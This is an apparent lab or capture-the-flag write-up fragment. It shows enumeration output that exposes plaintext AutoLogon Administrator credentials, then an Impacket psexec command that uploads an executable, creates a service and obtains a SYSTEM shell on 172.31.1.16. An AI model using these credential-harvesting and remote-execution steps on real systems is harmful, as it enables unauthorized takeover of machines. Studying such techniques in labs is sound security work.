


  [+] Looking for AutoLogon credentials(T1012)
    Some AutoLogon credentials were found!! 
    DefaultUserName               :  Administrator
    DefaultPassword               :  PzCEKhvj6gQMk7kA


```zsh
 python psexec.py 'Administrator'@172.31.1.16                                                                                                       
Impacket v0.9.22.dev1+20200518.92028.525fa3d0 - Copyright 2020 SecureAuth Corporation                                                                                       
                                                                                                                                                                            
Password:                                                                                                                                                                   
[*] Requesting shares on 172.31.1.16.....                                                                                                                                   
[*] Found writable share ADMIN$                                                                                                                                             
[*] Uploading file yPQxUYCn.exe                                                                                                                                             
[*] Opening SVCManager on 172.31.1.16.....                                                                                                                                  
[*] Creating service azEi on 172.31.1.16.....                                                                                                                               
[*] Starting service azEi.....             
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
```